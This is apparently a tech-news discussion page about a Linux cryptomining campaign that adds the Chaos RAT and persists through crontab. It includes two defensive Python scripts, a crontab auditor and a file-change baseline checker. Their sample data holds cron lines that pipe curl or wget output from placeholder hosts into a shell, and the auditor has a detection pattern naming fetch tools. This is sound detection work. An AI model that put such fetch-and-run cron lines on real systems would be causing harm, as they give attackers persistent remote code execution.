Researchers smell a cryptomining Chaos RAT targeting Linux:
A type of cryptomining malware targeting Linux-based systems has added capabilities by incorporating an open source remote access trojan called Chaos RAT with several advanced functions that bad guys can use to control remote operating systems.
Trend Micro security researchers discovered the threat last month. Like earlier, similar versions of the miner that also target Linux operating systems, the code kills competing malware and resources that affect cryptocurrency mining performance.
The newer malware then establishes persistence "by altering /etc/crontab file, a UNIX task scheduler that, in this case, downloads itself every 10 minutes from Pastebin," wrote Trend Micro researchers David Fiser and Alfredo Oliveira.
After that, it downloads an XMRig miner, a configuration file, another payload that continually kills competing malware, and the Chaos RAT (remote access tool), which is written in Go and has a ton of capabilities including restarting and shutting down the victim's machine.
[...] "On the surface, the incorporation of a RAT into the infection routine of a cryptocurrency mining malware might seem relatively minor," Fiser and Oliveira said.
"However, given the tool's array of functions and the fact that this evolution shows that cloud-based threat actors are still evolving their campaigns, it is important that both organizations and individuals stay extra vigilant when it comes to security," they continued.
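The persistence trick described above (a /etc/crontab entry that re-downloads the payload every 10 minutes from a paste site) is something a defender can audit for mechanically. The following Python script is an added example written for this discussion, not code from Trend Micro or the article: it parses system-crontab lines, works out the shortest run interval implied by the minute and hour fields, and flags entries that both run frequently and fetch something over the network. The sample crontab, the `pastebin.example` and `updates.example` URLs and the pattern list are all constructed for the example.

```python
import re
from dataclasses import dataclass

# Constructed indicator list for this example: commands that pull content from
# the network. Extend it for your own environment.
FETCH_PATTERNS = re.compile(r"\b(curl|wget|fetch)\b|pastebin|https?://", re.IGNORECASE)


@dataclass
class Finding:
    line_no: int
    interval_minutes: int
    user: str
    command: str


def minute_field_interval(field: str) -> int:
    """Smallest gap in minutes between two runs implied by a cron minute field.
    A single fixed minute means at most once an hour, so it returns 60."""
    if field == "*":
        return 1
    m = re.fullmatch(r"\*/(\d+)", field)
    if m:
        return max(1, int(m.group(1)))
    minutes = set()
    for part in field.split(","):
        m = re.fullmatch(r"(\d+)-(\d+)(?:/(\d+))?", part)
        if m:
            lo, hi, step = int(m.group(1)), int(m.group(2)), int(m.group(3) or 1)
            minutes.update(range(lo, hi + 1, step))
        elif part.isdigit():
            minutes.add(int(part))
        else:
            return 1  # unknown syntax: assume the worst case (every minute)
    if len(minutes) <= 1:
        return 60
    ordered = sorted(minutes)
    gaps = [b - a for a, b in zip(ordered, ordered[1:])]
    gaps.append(ordered[0] + 60 - ordered[-1])  # wrap-around gap across the hour
    return min(gaps)


def parse_system_crontab(text: str):
    """Yield (line_no, minute, hour, user, command) for /etc/crontab-style lines.
    The system crontab has a user column between the time fields and the command."""
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank line, comment, or VAR=value assignment
        parts = line.split(None, 6)
        if len(parts) < 7:
            continue
        minute, hour, _dom, _mon, _dow, user, command = parts
        yield no, minute, hour, user, command


def suspicious_cron_entries(text: str, max_interval: int = 15):
    """Entries that run at least every `max_interval` minutes and fetch from the network."""
    findings = []
    for no, minute, hour, user, command in parse_system_crontab(text):
        interval = minute_field_interval(minute)
        if hour != "*" and not hour.startswith("*/"):
            interval = max(interval, 60)  # restricted to specific hours
        if interval <= max_interval and FETCH_PATTERNS.search(command):
            findings.append(Finding(no, interval, user, command))
    return findings


# Constructed sample /etc/crontab: two legitimate system entries, one backup job,
# and two frequent network-fetching jobs of the kind the article describes.
SAMPLE_CRONTAB = """\
# /etc/crontab: system-wide crontab (constructed sample)
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || run-parts --report /etc/cron.daily
*/10 * * * *    root    curl -fsSL http://pastebin.example/raw/PLACEHOLDER | sh
0,30 * * * *    backup  /usr/local/bin/rsync-backup.sh
* * * * *       www-data wget -q -O - https://updates.example/agent | bash
"""

if __name__ == "__main__":
    for f in suspicious_cron_entries(SAMPLE_CRONTAB):
        print(f"line {f.line_no}: every {f.interval_minutes} min as {f.user}: {f.command}")
```

On a real host, read `/etc/crontab` and the files under `/etc/cron.d/` into `suspicious_cron_entries`; per-user crontabs (`crontab -l -u USER`) lack the user column, so they need the six-field variant of the parser. A legitimate agent updater can also match, so treat the output as a review list rather than a verdict.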
(Score: 2) by Opportunist on Monday December 19, @02:56PM
So trojans are the domain of jokers and skiddies again? I was under the impression that it's firmly in the grasp of for-profit criminals.
(Score: 2) by VLM on Monday December 19, @04:59PM (3 children)
Sure that's not a false alarm because it's just systemd doin' its thing?
Anyone who's ever had to adjust their /etc/resolv.conf knows the feeling.
(Score: 4, Interesting) by RS3 on Monday December 19, @08:45PM (2 children)
You inspired me to check in on a server. No systemd running; I'm severely allergic. But I find /etc/resolv.conf regularly gets new timestamps (file contents remain unchanged though).
It turns out "NetworkManager", a kind of mini systemd IMHO, keeps doing this and that. I may disable it, but I don't want to waste time on it because I'm in the process of evaluating distros for something much more stable (no demonic daemons please). Very sadly, systemd is pervasive and has corrupted too many otherwise awesome distros.
Anyway, point is in some OSes a legit system process, other than systemd, might be actively changing system files, which makes it that much harder to figure out if something has infected the machine.
(Score: 0) by Anonymous Coward on Tuesday December 20, @06:00AM (1 child)
This is concerning. I just checked my /etc/resolv.conf and it has a timestamp that I can't correlate with a change that I made. Contents are:
# Generated by NetworkManager
nameserver 127.0.0.53
Wth? If something is changing my network configuration, I'd really like to know about it.
(Score: 2) by RS3 on Tuesday December 20, @06:31AM
Again, "NetworkManager" is the exact name of the process; see if you have that running ( ps aux | grep -i network ). Pretty obvious you do.
man NetworkManager
important stuff in:
/etc/NetworkManager
/etc/sysconfig
/etc/sysconfig/networking
/etc/sysconfig/network-scripts
...
Worse yet, maybe you have systemd too?
Which distro / version are you running?
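The observation in this subthread, a new mtime on /etc/resolv.conf while the contents stay the same, is exactly the case a timestamp-only check cannot separate from a real modification. The Python below is an added example for this discussion, not code posted by anyone in the thread: it records a baseline of mtime plus SHA-256 for a set of files and then classifies each file as unchanged, touched (rewritten with identical bytes, the NetworkManager pattern), or modified (content actually changed). The demo runs in a temporary directory with constructed files; the `pastebin.example` URL in the appended crontab line is a placeholder.

```python
import hashlib
import os
import tempfile
import time
from pathlib import Path


def sha256_of(path) -> str:
    """Streaming SHA-256 of a file's contents."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(paths):
    """Baseline: mtime and content hash for each path, keyed by path string."""
    return {
        str(p): {"mtime": os.stat(p).st_mtime, "sha256": sha256_of(p)}
        for p in paths
    }


def compare(baseline, paths):
    """Classify each path against the baseline:
    'unchanged', 'touched' (new mtime, same bytes), 'modified' (bytes differ),
    'missing' (gone), or 'new' (not in baseline)."""
    result = {}
    for p in paths:
        key = str(p)
        if not os.path.exists(p):
            result[key] = "missing"
            continue
        current = {"mtime": os.stat(p).st_mtime, "sha256": sha256_of(p)}
        old = baseline.get(key)
        if old is None:
            result[key] = "new"
        elif current["sha256"] != old["sha256"]:
            result[key] = "modified"
        elif current["mtime"] != old["mtime"]:
            result[key] = "touched"
        else:
            result[key] = "unchanged"
    return result


def demo():
    """Constructed scenario in a temp dir: resolv.conf is rewritten with identical
    content (what a NetworkManager rewrite looks like); crontab gains a line."""
    with tempfile.TemporaryDirectory() as d:
        resolv = Path(d) / "resolv.conf"
        crontab = Path(d) / "crontab"
        resolv.write_text("# Generated by NetworkManager\nnameserver 127.0.0.53\n")
        crontab.write_text("17 * * * * root run-parts /etc/cron.hourly\n")
        base = snapshot([resolv, crontab])

        later = time.time() + 5  # force a visibly different mtime on any filesystem
        resolv.write_text(resolv.read_text())  # same bytes, fresh timestamp
        os.utime(resolv, (later, later))
        with open(crontab, "a") as f:  # genuine content change (placeholder URL)
            f.write("*/10 * * * * root curl http://pastebin.example/raw/PLACEHOLDER | sh\n")
        os.utime(crontab, (later, later))

        return compare(base, [resolv, crontab])


if __name__ == "__main__":
    for path, verdict in demo().items():
        print(f"{verdict:9s} {os.path.basename(path)}")
```

For real use, persist the baseline (for example as JSON) somewhere the monitored host cannot silently rewrite it, and run `compare` from cron or a timer; a "touched" verdict on resolv.conf is then a known NetworkManager habit, while a "modified" verdict on /etc/crontab is worth an immediate look.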
(Score: 2) by Sjolfr on Monday December 19, @07:53PM (1 child)
Software 'systems' that break the fundamentals/standards of Linux usage deserve this kind of thing. The problem here is that an administrator has to allow this CHAOS system absolute control of the systems they intend to manage with it. It's just like hiring a known spy to administer your data-sensitive systems; you're asking for problems.
Any Linux Systems Engineer worth anything will tell you that there are standard systems tools to manage systems from anywhere. All one has to do is put them together in a way that fits within the security standards that are applicable. Same thing applies for home users of Linux ... learn the basics of the tools at your disposal and these all-in-one tools become irrelevant. Shortcuts are not worth it and cause more issues in the long run. You'd think we could learn from M$ failures.
You may as well just broadcast your passwords in plain text and see if someone will login to your machine(s) and back up your partition tables for you. That is not malware or a virus or a trojan ... it's a destructive program/practice that nearly-blind administrators let in to their systems.
(Score: 2) by Sjolfr on Monday December 19, @08:03PM
Christ ... the article is a pre-sales tool as well.
Instead of introducing an insecure practice/protocol/software into your systems and then spending money to buy more software that may or may not actually mitigate the problem that you introduced ... don't use the software to begin with or get rid of it. Even a cursory evaluation of that CHAOS software makes me cringe.